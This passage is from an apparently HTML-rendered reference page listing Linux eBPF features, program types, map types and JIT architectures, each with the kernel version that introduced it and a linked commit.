<tr><td>ARM64</td><td>3.18</td><td><a href="https://github.com/torvalds/linux/commit/e54bcde3d69d40023ae77727213d14f920eb264a"><code>e54bcde3d69d</code></a></td></tr>
|
||
<tr><td>s390</td><td>4.1</td><td><a href="https://github.com/torvalds/linux/commit/054623105728b06852f077299e2bf1bf3d5f2b0b"><code>054623105728</code></a></td></tr>
|
||
<tr><td>Constant blinding for JIT machines</td><td>4.7</td><td><a href="https://github.com/torvalds/linux/commit/4f3446bb809f20ad56cadf712e6006815ae7a8f9"><code>4f3446bb809f</code></a></td></tr>
|
||
<tr><td>PowerPC64</td><td>4.8</td><td><a href="https://github.com/torvalds/linux/commit/156d0e290e969caba25f1851c52417c14d141b24"><code>156d0e290e96</code></a></td></tr>
|
||
<tr><td>Constant blinding - PowerPC64</td><td>4.9</td><td><a href="https://github.com/torvalds/linux/commit/b7b7013cac55d794940bd9cb7b7c55c9dececac4"><code>b7b7013cac55</code></a></td></tr>
|
||
<tr><td>Sparc64</td><td>4.12</td><td><a href="https://github.com/torvalds/linux/commit/7a12b5031c6b947cc13918237ae652b536243b76"><code>7a12b5031c6b</code></a></td></tr>
|
||
<tr><td>MIPS</td><td>4.13</td><td><a href="https://github.com/torvalds/linux/commit/f381bf6d82f032b7410185b35d000ea370ac706b"><code>f381bf6d82f0</code></a></td></tr>
|
||
<tr><td>ARM32</td><td>4.14</td><td><a href="https://github.com/torvalds/linux/commit/39c13c204bb1150d401e27d41a9d8b332be47c49"><code>39c13c204bb1</code></a></td></tr>
|
||
<tr><td>x86_32</td><td>4.18</td><td><a href="https://github.com/torvalds/linux/commit/03f5781be2c7b7e728d724ac70ba10799cc710d7"><code>03f5781be2c7</code></a></td></tr>
|
||
<tr><td>RISC-V RV64G</td><td>5.1</td><td><a href="https://github.com/torvalds/linux/commit/2353ecc6f91fd15b893fa01bf85a1c7a823ee4f2"><code>2353ecc6f91f</code></a></td></tr>
|
||
<tr><td>RISC-V RV32G</td><td>5.7</td><td><a href="https://github.com/torvalds/linux/commit/5f316b65e99f109942c556dc8790abd4c75bcb34"><code>5f316b65e99f</code></a></td></tr>
|
||
<tr><td>PowerPC32</td><td>5.13</td><td><a href="https://github.com/torvalds/linux/commit/51c66ad849a703d9bbfd7704c941827aed0fd9fd"><code>51c66ad849a7</code></a></td></tr>
|
||
<tr><td>LoongArch</td><td>6.1</td><td><a href="https://github.com/torvalds/linux/commit/5dc615520c4dfb358245680f1904bad61116648e"><code>5dc615520c4d</code></a></td></tr>
|
||
</tbody></table>
|
||
</div>
|
||
<h2 id="main-features"><a class="header" href="#main-features">Main features</a></h2>
|
||
<p>Several (but not all) of these <em>main features</em> translate to an eBPF program type.
|
||
The list of such program types supported in your kernel can be found in file
|
||
<a href="https://github.com/torvalds/linux/blob/master/include/uapi/linux/bpf.h"><code>include/uapi/linux/bpf.h</code></a>:</p>
|
||
<pre><code class="language-sh">git grep -W 'bpf_prog_type {' include/uapi/linux/bpf.h
|
||
</code></pre>
|
||
<div class="table-wrapper"><table><thead><tr><th>Feature</th><th>Kernel version</th><th>Commit</th></tr></thead><tbody>
|
||
<tr><td><code>AF_PACKET</code> (libpcap/tcpdump, <code>cls_bpf</code> classifier, netfilter's <code>xt_bpf</code>, team driver's load-balancing mode…)</td><td>3.15</td><td><a href="https://github.com/torvalds/linux/commit/bd4cf0ed331a275e9bf5a49e6d0fd55dffc551b8"><code>bd4cf0ed331a</code></a></td></tr>
|
||
<tr><td>Kernel helpers</td><td>3.15</td><td><a href="https://github.com/torvalds/linux/commit/bd4cf0ed331a275e9bf5a49e6d0fd55dffc551b8"><code>bd4cf0ed331a</code></a></td></tr>
|
||
<tr><td><code>bpf()</code> syscall</td><td>3.18</td><td><a href="https://github.com/torvalds/linux/commit/99c55f7d47c0dc6fc64729f37bf435abf43f4c60"><code>99c55f7d47c0</code></a></td></tr>
|
||
<tr><td>Maps (<em>a.k.a.</em> Tables; details below)</td><td>3.18</td><td><a href="https://github.com/torvalds/linux/commit/99c55f7d47c0dc6fc64729f37bf435abf43f4c60"><code>99c55f7d47c0</code></a></td></tr>
|
||
<tr><td>BPF attached to sockets</td><td>3.19</td><td><a href="https://github.com/torvalds/linux/commit/89aa075832b0da4402acebd698d0411dcc82d03e"><code>89aa075832b0</code></a></td></tr>
|
||
<tr><td>BPF attached to <code>kprobes</code></td><td>4.1</td><td><a href="https://github.com/torvalds/linux/commit/2541517c32be2531e0da59dfd7efc1ce844644f5"><code>2541517c32be</code></a></td></tr>
|
||
<tr><td><code>cls_bpf</code> / <code>act_bpf</code> for <code>tc</code></td><td>4.1</td><td><a href="https://github.com/torvalds/linux/commit/e2e9b6541dd4b31848079da80fe2253daaafb549"><code>e2e9b6541dd4</code></a></td></tr>
|
||
<tr><td>Tail calls</td><td>4.2</td><td><a href="https://github.com/torvalds/linux/commit/04fd61ab36ec065e194ab5e74ae34a5240d992bb"><code>04fd61ab36ec</code></a></td></tr>
|
||
<tr><td>Non-root programs on sockets</td><td>4.4</td><td><a href="https://github.com/torvalds/linux/commit/1be7f75d1668d6296b80bf35dcf6762393530afc"><code>1be7f75d1668</code></a></td></tr>
|
||
<tr><td>Persistent maps and programs (virtual FS)</td><td>4.4</td><td><a href="https://github.com/torvalds/linux/commit/b2197755b2633e164a439682fb05a9b5ea48f706"><code>b2197755b263</code></a></td></tr>
|
||
<tr><td><code>tc</code>'s <code>direct-action</code> (<code>da</code>) mode</td><td>4.4</td><td><a href="https://github.com/torvalds/linux/commit/045efa82ff563cd4e656ca1c2e354fa5bf6bbda4"><code>045efa82ff56</code></a></td></tr>
|
||
<tr><td><code>tc</code>'s <code>clsact</code> qdisc</td><td>4.5</td><td><a href="https://github.com/torvalds/linux/commit/1f211a1b929c804100e138c5d3d656992cfd5622"><code>1f211a1b929c</code></a></td></tr>
|
||
<tr><td>BPF attached to tracepoints</td><td>4.7</td><td><a href="https://github.com/torvalds/linux/commit/98b5c2c65c2951772a8fc661f50d675e450e8bce"><code>98b5c2c65c29</code></a></td></tr>
|
||
<tr><td>Direct packet access</td><td>4.7</td><td><a href="https://github.com/torvalds/linux/commit/969bf05eb3cedd5a8d4b7c346a85c2ede87a6d6d"><code>969bf05eb3ce</code></a></td></tr>
|
||
<tr><td>XDP (see below)</td><td>4.8</td><td><a href="https://github.com/torvalds/linux/commit/6a773a15a1e8874e5eccd2f29190c31085912c95"><code>6a773a15a1e8</code></a></td></tr>
|
||
<tr><td>BPF attached to perf events</td><td>4.9</td><td><a href="https://github.com/torvalds/linux/commit/0515e5999a466dfe6e1924f460da599bb6821487"><code>0515e5999a46</code></a></td></tr>
|
||
<tr><td>Hardware offload for <code>tc</code>'s <code>cls_bpf</code></td><td>4.9</td><td><a href="https://github.com/torvalds/linux/commit/332ae8e2f6ecda5e50c5c62ed62894963e3a83f5"><code>332ae8e2f6ec</code></a></td></tr>
|
||
<tr><td>Verifier exposure and internal hooks</td><td>4.9</td><td><a href="https://github.com/torvalds/linux/commit/13a27dfc669724564aafa2699976ee756029fed2"><code>13a27dfc6697</code></a></td></tr>
|
||
<tr><td>BPF attached to cgroups for socket filtering</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/0e33661de493db325435d565a4a722120ae4cbf3"><code>0e33661de493</code></a></td></tr>
|
||
<tr><td>Lightweight tunnel encapsulation</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/3a0af8fd61f90920f6fa04e4f1e9a6a73c1b4fd2"><code>3a0af8fd61f9</code></a></td></tr>
|
||
<tr><td><strong>e</strong>BPF support for <code>xt_bpf</code> module (iptables)</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/2c16d60332643e90d4fa244f4a706c454b8c7569"><code>2c16d6033264</code></a></td></tr>
|
||
<tr><td>BPF program tag</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/7bd509e311f408f7a5132fcdde2069af65fa05ae"><code>7bd509e311f4</code></a></td></tr>
|
||
<tr><td>Tracepoints to debug BPF</td><td>4.11 (removed in 4.18)</td><td><a href="https://github.com/torvalds/linux/commit/a67edbf4fb6deadcfe57a04a134abed4a5ba3bb5"><code>a67edbf4fb6d</code></a> <a href="https://github.com/torvalds/linux/commit/4d220ed0f8140c478ab7b0a14d96821da639b646"><code>4d220ed0f814</code></a></td></tr>
|
||
<tr><td>Testing / benchmarking BPF programs</td><td>4.12</td><td><a href="https://github.com/torvalds/linux/commit/1cf1cae963c2e6032aebe1637e995bc2f5d330f4"><code>1cf1cae963c2</code></a></td></tr>
|
||
<tr><td>BPF programs and maps IDs</td><td>4.13</td><td><a href="https://github.com/torvalds/linux/commit/dc4bb0e2356149aee4cdae061936f3bbdd45595c"><code>dc4bb0e23561</code></a></td></tr>
|
||
<tr><td>BPF support for <code>sock_ops</code></td><td>4.13</td><td><a href="https://github.com/torvalds/linux/commit/40304b2a1567fecc321f640ee4239556dd0f3ee0"><code>40304b2a1567</code></a></td></tr>
|
||
<tr><td>BPF support for skbs on sockets</td><td>4.14</td><td><a href="https://github.com/torvalds/linux/commit/b005fd189cec9407b700599e1e80e0552446ee79"><code>b005fd189cec</code></a></td></tr>
|
||
<tr><td>bpftool utility in kernel sources</td><td>4.15</td><td><a href="https://github.com/torvalds/linux/commit/71bb428fe2c19512ac671d5ee16ef3e73e1b49a8"><code>71bb428fe2c1</code></a></td></tr>
|
||
<tr><td>BPF attached to cgroups as device controller</td><td>4.15</td><td><a href="https://github.com/torvalds/linux/commit/ebc614f687369f9df99828572b1d85a7c2de3d92"><code>ebc614f68736</code></a></td></tr>
|
||
<tr><td>bpf2bpf function calls</td><td>4.16</td><td><a href="https://github.com/torvalds/linux/commit/cc8b0b92a1699bc32f7fec71daa2bfc90de43a4d"><code>cc8b0b92a169</code></a></td></tr>
|
||
<tr><td>BPF used for monitoring socket RX/TX data</td><td>4.17</td><td><a href="https://github.com/torvalds/linux/commit/4f738adba30a7cfc006f605707e7aee847ffefa0"><code>4f738adba30a</code></a></td></tr>
|
||
<tr><td>BPF attached to raw tracepoints</td><td>4.17</td><td><a href="https://github.com/torvalds/linux/commit/c4f6699dfcb8558d138fe838f741b2c10f416cf9"><code>c4f6699dfcb8</code></a></td></tr>
|
||
<tr><td>BPF attached to <code>bind()</code> system call</td><td>4.17</td><td><a href="https://github.com/torvalds/linux/commit/4fbac77d2d092b475dda9eea66da674369665427"><code>4fbac77d2d09</code></a> <a href="https://github.com/torvalds/linux/commit/aac3fc320d9404f2665a8b1249dc3170d5fa3caf"><code>aac3fc320d94</code></a></td></tr>
|
||
<tr><td>BPF attached to <code>connect()</code> system call</td><td>4.17</td><td><a href="https://github.com/torvalds/linux/commit/d74bad4e74ee373787a9ae24197c17b7cdc428d5"><code>d74bad4e74ee</code></a></td></tr>
|
||
<tr><td>BPF Type Format (BTF)</td><td>4.18</td><td><a href="https://github.com/torvalds/linux/commit/69b693f0aefa0ed521e8bd02260523b5ae446ad7"><code>69b693f0aefa</code></a></td></tr>
|
||
<tr><td>AF_XDP</td><td>4.18</td><td><a href="https://github.com/torvalds/linux/commit/fbfc504a24f53f7ebe128ab55cb5dba634f4ece8"><code>fbfc504a24f5</code></a></td></tr>
|
||
<tr><td>bpfilter</td><td>4.18</td><td><a href="https://github.com/torvalds/linux/commit/d2ba09c17a0647f899d6c20a11bab9e6d3382f07"><code>d2ba09c17a06</code></a></td></tr>
|
||
<tr><td>End.BPF action for seg6local LWT</td><td>4.18</td><td><a href="https://github.com/torvalds/linux/commit/004d4b274e2a1a895a0e5dc66158b90a7d463d44"><code>004d4b274e2a</code></a></td></tr>
|
||
<tr><td>BPF attached to LIRC devices</td><td>4.18</td><td><a href="https://github.com/torvalds/linux/commit/f4364dcfc86df7c1ca47b256eaf6b6d0cdd0d936"><code>f4364dcfc86d</code></a></td></tr>
|
||
<tr><td>Pass map values to map helpers</td><td>4.18</td><td><a href="https://github.com/torvalds/linux/commit/d71962f3e627b5941804036755c844fabfb65ff5"><code>d71962f3e627</code></a></td></tr>
|
||
<tr><td>BPF socket reuseport</td><td>4.19</td><td><a href="https://github.com/torvalds/linux/commit/2dbb9b9e6df67d444fbe425c7f6014858d337adf"><code>2dbb9b9e6df6</code></a></td></tr>
|
||
<tr><td>BPF flow dissector</td><td>4.20</td><td><a href="https://github.com/torvalds/linux/commit/d58e468b1112dcd1d5193c0a89ff9f98b5a3e8b9"><code>d58e468b1112</code></a></td></tr>
|
||
<tr><td>BPF 1M insn limit</td><td>5.2</td><td><a href="https://github.com/torvalds/linux/commit/c04c0d2b968ac45d6ef020316808ef6c82325a82"><code>c04c0d2b968a</code></a></td></tr>
|
||
<tr><td>BPF cgroup sysctl</td><td>5.2</td><td><a href="https://github.com/torvalds/linux/commit/7b146cebe30cb481b0f70d85779da938da818637"><code>7b146cebe30c</code></a></td></tr>
|
||
<tr><td>BPF raw tracepoint writable</td><td>5.2</td><td><a href="https://github.com/torvalds/linux/commit/9df1c28bb75217b244257152ab7d788bb2a386d0"><code>9df1c28bb752</code></a></td></tr>
|
||
<tr><td>BPF bounded loop</td><td>5.3</td><td><a href="https://github.com/torvalds/linux/commit/2589726d12a1b12eaaa93c7f1ea64287e383c7a5"><code>2589726d12a1</code></a></td></tr>
|
||
<tr><td>BPF trampoline</td><td>5.5</td><td><a href="https://github.com/torvalds/linux/commit/fec56f5890d93fc2ed74166c397dc186b1c25951"><code>fec56f5890d9</code></a></td></tr>
|
||
<tr><td>BPF LSM hook</td><td>5.7</td><td><a href="https://github.com/torvalds/linux/commit/fc611f47f2188ade2b48ff6902d5cce8baac0c58"><code>fc611f47f218</code></a> <a href="https://github.com/torvalds/linux/commit/641cd7b06c911c5935c34f24850ea18690649917"><code>641cd7b06c91</code></a></td></tr>
|
||
<tr><td>BPF iterator</td><td>5.8</td><td><a href="https://github.com/torvalds/linux/commit/180139dca8b38c858027b8360ee10064fdb2fbf7"><code>180139dca8b3</code></a></td></tr>
|
||
<tr><td>BPF socket lookup hook</td><td>5.9</td><td><a href="https://github.com/torvalds/linux/commit/e9ddbb7707ff5891616240026062b8c1e29864ca"><code>e9ddbb7707ff</code></a></td></tr>
|
||
<tr><td>Sleepable BPF programs</td><td>5.10</td><td><a href="https://github.com/torvalds/linux/commit/1e6c62a8821557720a9b2ea9617359b264f2f67c"><code>1e6c62a88215</code></a></td></tr>
|
||
</tbody></table>
|
||
</div>
|
||
<h3 id="program-types"><a class="header" href="#program-types">Program types</a></h3>
|
||
<div class="table-wrapper"><table><thead><tr><th>Program type</th><th>Kernel version</th><th>Commit</th><th>Enum</th></tr></thead><tbody>
|
||
<tr><td>Socket filter</td><td>3.19</td><td><a href="https://github.com/torvalds/linux/commit/ddd872bc3098f9d9abe1680a6b2013e59e3337f7"><code>ddd872bc3098</code></a></td><td>BPF_PROG_TYPE_SOCKET_FILTER</td></tr>
|
||
<tr><td>Kprobe</td><td>4.1</td><td><a href="https://github.com/torvalds/linux/commit/2541517c32be2531e0da59dfd7efc1ce844644f5"><code>2541517c32be</code></a></td><td>BPF_PROG_TYPE_KPROBE</td></tr>
|
||
<tr><td>traffic control (TC)</td><td>4.1</td><td><a href="https://github.com/torvalds/linux/commit/96be4325f443dbbfeb37d2a157675ac0736531a1"><code>96be4325f443</code></a></td><td>BPF_PROG_TYPE_SCHED_CLS</td></tr>
|
||
<tr><td>traffic control (TC)</td><td>4.1</td><td><a href="https://github.com/torvalds/linux/commit/94caee8c312d96522bcdae88791aaa9ebcd5f22c"><code>94caee8c312d</code></a></td><td>BPF_PROG_TYPE_SCHED_ACT</td></tr>
|
||
<tr><td>Tracepoint</td><td>4.7</td><td><a href="https://github.com/torvalds/linux/commit/98b5c2c65c2951772a8fc661f50d675e450e8bce"><code>98b5c2c65c29</code></a></td><td>BPF_PROG_TYPE_TRACEPOINT</td></tr>
|
||
<tr><td>XDP</td><td>4.8</td><td><a href="https://github.com/torvalds/linux/commit/6a773a15a1e8874e5eccd2f29190c31085912c95"><code>6a773a15a1e8</code></a></td><td>BPF_PROG_TYPE_XDP</td></tr>
|
||
<tr><td>Perf event</td><td>4.9</td><td><a href="https://github.com/torvalds/linux/commit/0515e5999a466dfe6e1924f460da599bb6821487"><code>0515e5999a46</code></a></td><td>BPF_PROG_TYPE_PERF_EVENT</td></tr>
|
||
<tr><td>cgroup socket filtering</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/0e33661de493db325435d565a4a722120ae4cbf3"><code>0e33661de493</code></a></td><td>BPF_PROG_TYPE_CGROUP_SKB</td></tr>
|
||
<tr><td>cgroup sock modification</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/61023658760032e97869b07d54be9681d2529e77"><code>610236587600</code></a></td><td>BPF_PROG_TYPE_CGROUP_SOCK</td></tr>
|
||
<tr><td>lightweight tunnel (IN)</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/3a0af8fd61f90920f6fa04e4f1e9a6a73c1b4fd2"><code>3a0af8fd61f9</code></a></td><td>BPF_PROG_TYPE_LWT_IN</td></tr>
|
||
<tr><td>lightweight tunnel (OUT)</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/3a0af8fd61f90920f6fa04e4f1e9a6a73c1b4fd2"><code>3a0af8fd61f9</code></a></td><td>BPF_PROG_TYPE_LWT_OUT</td></tr>
|
||
<tr><td>lightweight tunnel (XMIT)</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/3a0af8fd61f90920f6fa04e4f1e9a6a73c1b4fd2"><code>3a0af8fd61f9</code></a></td><td>BPF_PROG_TYPE_LWT_XMIT</td></tr>
|
||
<tr><td>cgroup sock ops (per conn)</td><td>4.13</td><td><a href="https://github.com/torvalds/linux/commit/40304b2a1567fecc321f640ee4239556dd0f3ee0"><code>40304b2a1567</code></a></td><td>BPF_PROG_TYPE_SOCK_OPS</td></tr>
|
||
<tr><td>stream parser / stream verdict</td><td>4.14</td><td><a href="https://github.com/torvalds/linux/commit/b005fd189cec9407b700599e1e80e0552446ee79"><code>b005fd189cec</code></a></td><td>BPF_PROG_TYPE_SK_SKB</td></tr>
|
||
<tr><td>cgroup device manager</td><td>4.15</td><td><a href="https://github.com/torvalds/linux/commit/ebc614f687369f9df99828572b1d85a7c2de3d92"><code>ebc614f68736</code></a></td><td>BPF_PROG_TYPE_CGROUP_DEVICE</td></tr>
|
||
<tr><td>socket msg verdict</td><td>4.17</td><td><a href="https://github.com/torvalds/linux/commit/4f738adba30a7cfc006f605707e7aee847ffefa0"><code>4f738adba30a</code></a></td><td>BPF_PROG_TYPE_SK_MSG</td></tr>
|
||
<tr><td>Raw tracepoint</td><td>4.17</td><td><a href="https://github.com/torvalds/linux/commit/c4f6699dfcb8558d138fe838f741b2c10f416cf9"><code>c4f6699dfcb8</code></a></td><td>BPF_PROG_TYPE_RAW_TRACEPOINT</td></tr>
|
||
<tr><td>socket binding</td><td>4.17</td><td><a href="https://github.com/torvalds/linux/commit/4fbac77d2d092b475dda9eea66da674369665427"><code>4fbac77d2d09</code></a></td><td>BPF_PROG_TYPE_CGROUP_SOCK_ADDR</td></tr>
|
||
<tr><td>LWT seg6local</td><td>4.18</td><td><a href="https://github.com/torvalds/linux/commit/004d4b274e2a1a895a0e5dc66158b90a7d463d44"><code>004d4b274e2a</code></a></td><td>BPF_PROG_TYPE_LWT_SEG6LOCAL</td></tr>
|
||
<tr><td>lirc devices</td><td>4.18</td><td><a href="https://github.com/torvalds/linux/commit/f4364dcfc86df7c1ca47b256eaf6b6d0cdd0d936"><code>f4364dcfc86d</code></a></td><td>BPF_PROG_TYPE_LIRC_MODE2</td></tr>
|
||
<tr><td>lookup SO_REUSEPORT socket</td><td>4.19</td><td><a href="https://github.com/torvalds/linux/commit/2dbb9b9e6df67d444fbe425c7f6014858d337adf"><code>2dbb9b9e6df6</code></a></td><td>BPF_PROG_TYPE_SK_REUSEPORT</td></tr>
|
||
<tr><td>flow dissector</td><td>4.20</td><td><a href="https://github.com/torvalds/linux/commit/d58e468b1112dcd1d5193c0a89ff9f98b5a3e8b9"><code>d58e468b1112</code></a></td><td>BPF_PROG_TYPE_FLOW_DISSECTOR</td></tr>
|
||
<tr><td>cgroup sysctl</td><td>5.2</td><td><a href="https://github.com/torvalds/linux/commit/7b146cebe30cb481b0f70d85779da938da818637"><code>7b146cebe30c</code></a></td><td>BPF_PROG_TYPE_CGROUP_SYSCTL</td></tr>
|
||
<tr><td>writable raw tracepoints</td><td>5.2</td><td><a href="https://github.com/torvalds/linux/commit/9df1c28bb75217b244257152ab7d788bb2a386d0"><code>9df1c28bb752</code></a></td><td>BPF_PROG_TYPE_RAW_TRACEPOINT_WRITABLE</td></tr>
|
||
<tr><td>cgroup getsockopt/setsockopt</td><td>5.3</td><td><a href="https://github.com/torvalds/linux/commit/0d01da6afc5402f60325c5da31b22f7d56689b49"><code>0d01da6afc54</code></a></td><td>BPF_PROG_TYPE_CGROUP_SOCKOPT</td></tr>
|
||
<tr><td>Tracing (BTF/BPF trampoline)</td><td>5.5</td><td><a href="https://github.com/torvalds/linux/commit/f1b9509c2fb0ef4db8d22dac9aef8e856a5d81f6"><code>f1b9509c2fb0</code></a></td><td>BPF_PROG_TYPE_TRACING</td></tr>
|
||
<tr><td>struct ops</td><td>5.6</td><td><a href="https://github.com/torvalds/linux/commit/27ae7997a66174cb8afd6a75b3989f5e0c1b9e5a"><code>27ae7997a661</code></a></td><td>BPF_PROG_TYPE_STRUCT_OPS</td></tr>
|
||
<tr><td>extensions</td><td>5.6</td><td><a href="https://github.com/torvalds/linux/commit/be8704ff07d2374bcc5c675526f95e70c6459683"><code>be8704ff07d2</code></a></td><td>BPF_PROG_TYPE_EXT</td></tr>
|
||
<tr><td>LSM</td><td>5.7</td><td><a href="https://github.com/torvalds/linux/commit/fc611f47f2188ade2b48ff6902d5cce8baac0c58"><code>fc611f47f218</code></a></td><td>BPF_PROG_TYPE_LSM</td></tr>
|
||
<tr><td>lookup listening socket</td><td>5.9</td><td><a href="https://github.com/torvalds/linux/commit/e9ddbb7707ff5891616240026062b8c1e29864ca"><code>e9ddbb7707ff</code></a></td><td>BPF_PROG_TYPE_SK_LOOKUP</td></tr>
|
||
<tr><td>Allow executing syscalls</td><td>5.15</td><td><a href="https://github.com/torvalds/linux/commit/79a7f8bdb159d9914b58740f3d31d602a6e4aca8"><code>79a7f8bdb159</code></a></td><td>BPF_PROG_TYPE_SYSCALL</td></tr>
|
||
</tbody></table>
|
||
</div>
|
||
<h2 id="maps-aka-tables-in-bcc-lingo"><a class="header" href="#maps-aka-tables-in-bcc-lingo">Maps (<em>a.k.a.</em> Tables, in BCC lingo)</a></h2>
|
||
<h3 id="map-types"><a class="header" href="#map-types">Map types</a></h3>
|
||
<p>The list of map types supported in your kernel can be found in the file
<a href="https://github.com/torvalds/linux/blob/master/include/uapi/linux/bpf.h"><code>include/uapi/linux/bpf.h</code></a>:</p>
|
||
<pre><code class="language-sh">git grep -W 'bpf_map_type {' include/uapi/linux/bpf.h
</code></pre>
|
||
<div class="table-wrapper"><table><thead><tr><th>Map type</th><th>Kernel version</th><th>Commit</th><th>Enum</th></tr></thead><tbody>
|
||
<tr><td>Hash</td><td>3.19</td><td><a href="https://github.com/torvalds/linux/commit/0f8e4bd8a1fc8c4185f1630061d0a1f2d197a475"><code>0f8e4bd8a1fc</code></a></td><td>BPF_MAP_TYPE_HASH</td></tr>
|
||
<tr><td>Array</td><td>3.19</td><td><a href="https://github.com/torvalds/linux/commit/28fbcfa08d8ed7c5a50d41a0433aad222835e8e3"><code>28fbcfa08d8e</code></a></td><td>BPF_MAP_TYPE_ARRAY</td></tr>
|
||
<tr><td>Prog array</td><td>4.2</td><td><a href="https://github.com/torvalds/linux/commit/04fd61ab36ec065e194ab5e74ae34a5240d992bb"><code>04fd61ab36ec</code></a></td><td>BPF_MAP_TYPE_PROG_ARRAY</td></tr>
|
||
<tr><td>Perf events</td><td>4.3</td><td><a href="https://github.com/torvalds/linux/commit/ea317b267e9d03a8241893aa176fba7661d07579"><code>ea317b267e9d</code></a></td><td>BPF_MAP_TYPE_PERF_EVENT_ARRAY</td></tr>
|
||
<tr><td>Per-CPU hash</td><td>4.6</td><td><a href="https://github.com/torvalds/linux/commit/824bd0ce6c7c43a9e1e210abf124958e54d88342"><code>824bd0ce6c7c</code></a></td><td>BPF_MAP_TYPE_PERCPU_HASH</td></tr>
|
||
<tr><td>Per-CPU array</td><td>4.6</td><td><a href="https://github.com/torvalds/linux/commit/a10423b87a7eae75da79ce80a8d9475047a674ee"><code>a10423b87a7e</code></a></td><td>BPF_MAP_TYPE_PERCPU_ARRAY</td></tr>
|
||
<tr><td>Stack trace</td><td>4.6</td><td><a href="https://github.com/torvalds/linux/commit/d5a3b1f691865be576c2bffa708549b8cdccda19"><code>d5a3b1f69186</code></a></td><td>BPF_MAP_TYPE_STACK_TRACE</td></tr>
|
||
<tr><td>cgroup array</td><td>4.8</td><td><a href="https://github.com/torvalds/linux/commit/4ed8ec521ed57c4e207ad464ca0388776de74d4b"><code>4ed8ec521ed5</code></a></td><td>BPF_MAP_TYPE_CGROUP_ARRAY</td></tr>
|
||
<tr><td>LRU hash</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/29ba732acbeece1e34c68483d1ec1f3720fa1bb3"><code>29ba732acbee</code></a> <a href="https://github.com/torvalds/linux/commit/3a08c2fd763450a927d1130de078d6f9e74944fb"><code>3a08c2fd7634</code></a></td><td>BPF_MAP_TYPE_LRU_HASH</td></tr>
|
||
<tr><td>LRU per-CPU hash</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/8f8449384ec364ba2a654f11f94e754e4ff719e0"><code>8f8449384ec3</code></a> <a href="https://github.com/torvalds/linux/commit/961578b63474d13ad0e2f615fcc2901c5197dda6"><code>961578b63474</code></a></td><td>BPF_MAP_TYPE_LRU_PERCPU_HASH</td></tr>
|
||
<tr><td>LPM trie (longest-prefix match)</td><td>4.11</td><td><a href="https://github.com/torvalds/linux/commit/b95a5c4db09bc7c253636cb84dc9b12c577fd5a0"><code>b95a5c4db09b</code></a></td><td>BPF_MAP_TYPE_LPM_TRIE</td></tr>
|
||
<tr><td>Array of maps</td><td>4.12</td><td><a href="https://github.com/torvalds/linux/commit/56f668dfe00dcf086734f1c42ea999398fad6572"><code>56f668dfe00d</code></a></td><td>BPF_MAP_TYPE_ARRAY_OF_MAPS</td></tr>
|
||
<tr><td>Hash of maps</td><td>4.12</td><td><a href="https://github.com/torvalds/linux/commit/bcc6b1b7ebf857a9fe56202e2be3361131588c15"><code>bcc6b1b7ebf8</code></a></td><td>BPF_MAP_TYPE_HASH_OF_MAPS</td></tr>
|
||
<tr><td>Netdevice references (array)</td><td>4.14</td><td><a href="https://github.com/torvalds/linux/commit/546ac1ffb70d25b56c1126940e5ec639c4dd7413"><code>546ac1ffb70d</code></a></td><td>BPF_MAP_TYPE_DEVMAP</td></tr>
|
||
<tr><td>Socket references (array)</td><td>4.14</td><td><a href="https://github.com/torvalds/linux/commit/174a79ff9515f400b9a6115643dafd62a635b7e6"><code>174a79ff9515</code></a></td><td>BPF_MAP_TYPE_SOCKMAP</td></tr>
|
||
<tr><td>CPU references</td><td>4.15</td><td><a href="https://github.com/torvalds/linux/commit/6710e1126934d8b4372b4d2f9ae1646cd3f151bf"><code>6710e1126934</code></a></td><td>BPF_MAP_TYPE_CPUMAP</td></tr>
|
||
<tr><td>AF_XDP socket (XSK) references</td><td>4.18</td><td><a href="https://github.com/torvalds/linux/commit/fbfc504a24f53f7ebe128ab55cb5dba634f4ece8"><code>fbfc504a24f5</code></a></td><td>BPF_MAP_TYPE_XSKMAP</td></tr>
|
||
<tr><td>Socket references (hashmap)</td><td>4.18</td><td><a href="https://github.com/torvalds/linux/commit/81110384441a59cff47430f20f049e69b98c17f4"><code>81110384441a</code></a></td><td>BPF_MAP_TYPE_SOCKHASH</td></tr>
|
||
<tr><td>cgroup storage</td><td>4.19</td><td><a href="https://github.com/torvalds/linux/commit/de9cbbaadba5adf88a19e46df61f7054000838f6"><code>de9cbbaadba5</code></a></td><td>BPF_MAP_TYPE_CGROUP_STORAGE</td></tr>
|
||
<tr><td>reuseport sockarray</td><td>4.19</td><td><a href="https://github.com/torvalds/linux/commit/5dc4c4b7d4e8115e7cde96a030f98cb3ab2e458c"><code>5dc4c4b7d4e8</code></a></td><td>BPF_MAP_TYPE_REUSEPORT_SOCKARRAY</td></tr>
|
||
<tr><td>percpu cgroup storage</td><td>4.20</td><td><a href="https://github.com/torvalds/linux/commit/b741f1630346defcbc8cc60f1a2bdae8b3b0036f"><code>b741f1630346</code></a></td><td>BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE</td></tr>
|
||
<tr><td>queue</td><td>4.20</td><td><a href="https://github.com/torvalds/linux/commit/f1a2e44a3aeccb3ff18d3ccc0b0203e70b95bd92"><code>f1a2e44a3aec</code></a></td><td>BPF_MAP_TYPE_QUEUE</td></tr>
|
||
<tr><td>stack</td><td>4.20</td><td><a href="https://github.com/torvalds/linux/commit/f1a2e44a3aeccb3ff18d3ccc0b0203e70b95bd92"><code>f1a2e44a3aec</code></a></td><td>BPF_MAP_TYPE_STACK</td></tr>
|
||
<tr><td>socket local storage</td><td>5.2</td><td><a href="https://github.com/torvalds/linux/commit/6ac99e8f23d4b10258406ca0dd7bffca5f31da9d"><code>6ac99e8f23d4</code></a></td><td>BPF_MAP_TYPE_SK_STORAGE</td></tr>
|
||
<tr><td>Netdevice references (hashmap)</td><td>5.4</td><td><a href="https://github.com/torvalds/linux/commit/6f9d451ab1a33728adb72d7ff66a7b374d665176"><code>6f9d451ab1a3</code></a></td><td>BPF_MAP_TYPE_DEVMAP_HASH</td></tr>
|
||
